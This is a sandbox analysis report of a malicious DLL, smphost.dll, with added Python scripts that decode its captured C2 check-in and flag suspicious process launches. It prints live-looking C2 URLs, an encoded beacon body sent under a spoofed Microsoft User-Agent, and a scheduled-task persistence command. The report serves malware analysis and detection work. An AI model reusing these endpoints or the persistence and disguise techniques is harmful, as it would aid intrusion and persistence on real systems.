Source: smphost.dll |
Virustotal: Detection: 8% |
Source: http://manageintel.com/WUzZRUBQje/Auth.php |
Avira URL Cloud: Label: malware |
Source: smphost.dll |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE |
Source: unknown |
HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49831 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49837 version: TLS 1.2 |
Source: smphost.dll |
Static PE information: certificate valid |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9EED8A FindFirstFileExW, |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6CED8A FindFirstFileExW, |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Domain query: the.earth.li |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Network Connect: 185.14.31.158 32710 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Network Connect: 93.93.131.124 187 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Domain query: manageintel.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49835 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49835 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49839 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49839 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49840 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49840 |
Source: Joe Sandbox View |
ASN Name: ITLDC-NLUA ITLDC-NLUA |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1
  Host: manageintel.com
  Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1
  Host: manageintel.com
  Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1
  Host: the.earth.li
  Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1
  Host: the.earth.li
  Cache-Control: no-cache
  Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1
  Host: manageintel.com
  Cache-Control: no-cache |
Source: Joe Sandbox View |
IP Address: 93.93.131.124 93.93.131.124 |
Source: global traffic |
TCP traffic: 192.168.2.3:49835 -> 185.14.31.158:32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49832 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49831 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49830 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49838 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49837 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49836 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49832 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49833 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49830 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49831 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49838 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49837 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49836 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49833 |
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe |
String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml |
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe |
String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml |
Source: unknown |
HTTP traffic detected: POST /WUzZRUBQje/Auth.php HTTP/1.1
  User-Agent: Windows-AzureAD-Authentication-Provider/11.0
  Host: manageintel.com
  Content-Length: 549
  Content-Type: application/x-www-form-urlencoded
  Accept-Language: en-US
  Data Ascii: auth=eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIsIjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiVXJ0bythRT0iLCI1ZGViOWMiOiJJdTA5cC9yViIsIkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9IiwiRnRvIjoiSnc9PSIsIlE2WDYiOiJWWnBMMlptcStnPT0iLCJUQU1mbSI6WyJXSXR6KzUrazVWaytLdz09Il0sImNCRiI6IlZwd28xdnZQOTJoUlFod2FlempkZEhzPSIsImUwM2VkIjoiVU9WWng2YU0wVVVMQ1haa01BK25mbWdPeUtnNGVhOVhUTkJOU2VMVENmWT0iLCJmMWRhIjoiVDROQjFaeXA0V1VzVngwR2Z5akhCZzQ9Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0iLCJ6a0M3IjoiIn0= |
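The check-in body above is a single form field, auth=, whose value is base64 of a JSON object; every member of that object is again a base64 string (or a one-element list of strings). The script below is an added example, not part of the sandbox report or of the sample: it decodes the captured body offline and lists the member keys with their decoded byte sizes, and checks that the body length agrees with the captured Content-Length. It does not try to recover the inner values, because the report says nothing about how they are encoded. The body constant is copied from the report; the function names are the example's own. It splits the field on the first "=" rather than using urllib.parse.parse_qs, which would turn any "+" in the base64 into a space.

```python
import base64
import json

# Body of the POST /WUzZRUBQje/Auth.php request captured in the report
# above (Content-Length: 549). Copied from the report, not constructed.
CAPTURED_BODY = (
    "auth="
    "eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIs"
    "IjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiVXJ0bythRT0iLCI1ZGViOWMiOiJJdTA5cC9yViIs"
    "IkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9Iiwi"
    "RnRvIjoiSnc9PSIsIlE2WDYiOiJWWnBMMlptcStnPT0iLCJUQU1mbSI6WyJXSXR6KzUrazVWaytLdz09"
    "Il0sImNCRiI6IlZwd28xdnZQOTJoUlFod2FlempkZEhzPSIsImUwM2VkIjoi"
    "VU9WWng2YU0wVVVMQ1haa01BK25mbWdPeUtnNGVhOVhUTkJOU2VMVENmWT0iLCJmMWRhIjoi"
    "VDROQjFaeXA0V1VzVngwR2Z5akhCZzQ9Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0i"
    "LCJ6a0M3IjoiIn0="
)


def form_param(body: str, name: str) -> str:
    """Return the raw value of one x-www-form-urlencoded field.

    Deliberately not urllib.parse.parse_qs: that maps '+' to a space, and
    '+' is a data character in the base64 payload we are after.
    """
    for fld in body.split("&"):
        key, sep, value = fld.partition("=")
        if sep and key == name:
            return value
    raise KeyError(name)


def decode_checkin(body: str) -> dict:
    """Decode the outer layer: auth=<base64(JSON object)>."""
    payload = base64.b64decode(form_param(body, "auth"), validate=True)
    obj = json.loads(payload)
    if not isinstance(obj, dict):
        raise ValueError("expected a JSON object in the auth parameter")
    return obj


def inner_value_sizes(obj: dict) -> dict:
    """Base64-decode every member (a string or a list of strings) and return
    the decoded byte count per key. What those bytes mean is not described
    by the report, so nothing further is inferred here."""
    sizes = {}
    for key, value in obj.items():
        items = value if isinstance(value, list) else [value]
        sizes[key] = sum(len(base64.b64decode(v, validate=True)) for v in items)
    return sizes


def content_length_ok(body: str, declared: int = 549) -> bool:
    """The captured Content-Length header should match the body we decode."""
    return len(body.encode("ascii")) == declared


if __name__ == "__main__":
    checkin = decode_checkin(CAPTURED_BODY)
    print(f"Content-Length consistent: {content_length_ok(CAPTURED_BODY)}")
    print(f"{len(checkin)} members with random-looking keys and base64 values:")
    for key, size in inner_value_sizes(checkin).items():
        print(f"  {key:<8} {size:3d} bytes")
```

Two things the decoded object makes visible that the raw line does not: the 16 keys are short random-looking strings rather than field names, and the values range from 0 to 38 bytes, so a detection keyed on body structure (one form field, base64 JSON, base64 members) is more durable than one keyed on any literal. The User-Agent on this request names a Microsoft authentication component but the Host is manageintel.com, the same domain that served the .xml GETs above; a proxy rule that matches that User-Agent string against a non-Microsoft destination would catch this check-in without decoding anything.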
Source: unknown |
DNS traffic detected: queries for: manageintel.com |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9F3EB6 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E8C90 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6D3EB6 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C8C90 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: String function: 6E9E9960 appears 34 times |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: String function: 6F6C9960 appears 34 times |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Section loaded: sfc.dll |
Source: C:\Windows\System32\regsvr32.exe |
Section loaded: sfc.dll |
Source: Joe Sandbox View |
Dropped File: C:\ProgramData\6\5507.ocx E58B9BBB7BCDF3E901453B7B9C9E514FED1E53565E3280353DCCC77CDE26A98E |
Source: smphost.dll |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Windows\System32\loaddll32.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\smphost.dll" |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx" |
Source: unknown |
Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
Source: C:\Windows\System32\regsvr32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076 |
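The process records above describe the staging chain the sandbox observed: regsvr32.exe loads the DLL, a copy appears as C:\ProgramData\6\5507.ocx, and a scheduled task is registered that runs regsvr32.exe against that file every three minutes, after which the 64-bit regsvr32.exe hands off to its SysWOW64 counterpart. The script below is an added example and is not from the report or the sample. It parses "Process created" records in the report's own two-line form and applies three heuristic checks an analyst would automate over endpoint telemetry: a LOLBin given a module path under a user-writable directory, a schtasks /Create whose action is a LOLBin on a minute schedule, and a task created by a LOLBin parent. The LOLBin set, the writable-path prefixes and all function names are the example's assumptions; the records are copied from the report with the schtasks quoting shown balanced.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Process-creation records copied from the report above: a "Source" line
# naming the parent, then the created image and its command line. Only the
# schtasks quoting has been normalized; nothing else is constructed.
REPORT_LINES = r"""
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx" |
Source: C:\Windows\System32\regsvr32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076 |
"""

PAIR_RE = re.compile(
    r"^Source: (?P<parent>\S+) \|[ \t]*\n"
    r"Process created: (?P<image>\S+) (?P<cmdline>.*?) \|[ \t]*$",
    re.MULTILINE,
)
# Windows-style tokenizer: a double-quoted run is a single argument.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')

# Heuristic lists assumed for this example, not taken from the report.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\", "%programdata%", "%appdata%", "%temp%")


@dataclass
class ProcessCreate:
    parent: str
    image: str
    cmdline: str
    findings: list[str] = field(default_factory=list)


def parse_report(text: str) -> list[ProcessCreate]:
    return [ProcessCreate(m["parent"], m["image"], m["cmdline"]) for m in PAIR_RE.finditer(text)]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tokens(cmdline: str) -> list[str]:
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def in_writable_dir(arg: str) -> bool:
    return arg.lower().startswith(WRITABLE_PREFIXES)


def triage(rec: ProcessCreate) -> list[str]:
    """Apply the three checks to one record and return its findings."""
    out: list[str] = []
    image = basename(rec.image)
    args = tokens(rec.cmdline)

    # 1. A LOLBin handed a module path inside a user-writable directory.
    if image in LOLBINS:
        out += [f"{image} loads module from writable path: {a}" for a in args if in_writable_dir(a)]

    # 2. schtasks /Create: inspect the /TR action, the schedule, and the parent.
    lower = [a.lower() for a in args]
    if image == "schtasks.exe" and "/create" in lower:
        action = args[lower.index("/tr") + 1] if "/tr" in lower[:-1] else ""
        action_args = tokens(action)
        if action_args and basename(action_args[0]) in LOLBINS:
            out.append(f"task action runs LOLBin: {action}")
        out += [f"task action loads module from writable path: {a}" for a in action_args if in_writable_dir(a)]
        if "/sc" in lower[:-1] and lower[lower.index("/sc") + 1] == "minute":
            out.append("task repeats on a minute schedule")
        # 3. The task was registered by a LOLBin rather than an installer or admin shell.
        if basename(rec.parent) in LOLBINS:
            out.append(f"task created by LOLBin parent {basename(rec.parent)}")

    rec.findings = out
    return out


def triage_report(text: str) -> list[ProcessCreate]:
    recs = parse_report(text)
    for rec in recs:
        triage(rec)
    return recs


if __name__ == "__main__":
    for rec in triage_report(REPORT_LINES):
        print(f"{basename(rec.parent)} -> {basename(rec.image)}: {len(rec.findings)} finding(s)")
        for f in rec.findings:
            print("   ", f)
```

On the records above the schtasks line alone trips all four checks, the two regsvr32 launches each trip the writable-path check, and the WerFault crash handler trips none, which is the separation you want before escalating. The loaddll32.exe parent on the first record is the sandbox's own loader harness; on a real endpoint the equivalent parent would be whatever process loaded the DLL, so the parent check is deliberately applied only to the schtasks record.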
Source: C:\Windows\SysWOW64\regsvr32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Source: C:\Windows\SysWOW64\WerFault.exe |
File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB43.tmp |
Source: classification engine |
Classification label: mal88.troj.evad.winDLL@19/7@5/2 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon, |
Source: C:\Windows\SysWOW64\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6260 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Mutant created: \Sessions\1\BaseNamedObjects\computer |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: C:\Windows\SysWOW64\WerFault.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File created: C:\ProgramData\6\5507.ocx |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604 |
Thread sleep time: -60000s >= -30000s |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604 |
Thread sleep time: -30000s >= -30000s |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008 |
Thread sleep time: -54000s >= -30000s |
Source: C:\Windows\System32\loaddll32.exe |
Last function: Thread delayed |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\loaddll32.exe |
API coverage: 6.8 % |
Source: C:\Windows\SysWOW64\regsvr32.exe |
API coverage: 6.3 % |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process information queried: ProcessInformation |
Source: C:\Windows\System32\loaddll32.exe |
Thread delayed: delay time: 120000 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Thread delayed: delay time: 30000 |
Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.518162902.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.511554101.0000000005051000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: 7qAJTueJV05Xwegg6bMAAApTi10HgfsAbFhzMiq3oTtaEegJyQAAWY/AdTfkf4tG |
Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bVf2XmkyVwC+WwEAAI1F4FpWU1dl//91iQ4iqeMuV07UhiCL+IN94AoPhboPAACF |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E9CF7 IsDebuggerPresent,OutputDebugStringW, |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9EFE17 GetProcessHeap, |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E1710 mov eax, dword ptr fs:[00000030h] |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E1490 mov eax, dword ptr fs:[00000030h] |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E83B0 mov eax, dword ptr fs:[00000030h] |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9EC865 mov eax, dword ptr fs:[00000030h] |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9EE9B4 mov eax, dword ptr fs:[00000030h] |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C1710 mov eax, dword ptr fs:[00000030h] |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C1490 mov eax, dword ptr fs:[00000030h] |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C83B0 mov eax, dword ptr fs:[00000030h] |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6CE9B4 mov eax, dword ptr fs:[00000030h] |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6CC865 mov eax, dword ptr fs:[00000030h] |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process queried: DebugPort |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9EC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6CC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E9658 cpuid |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |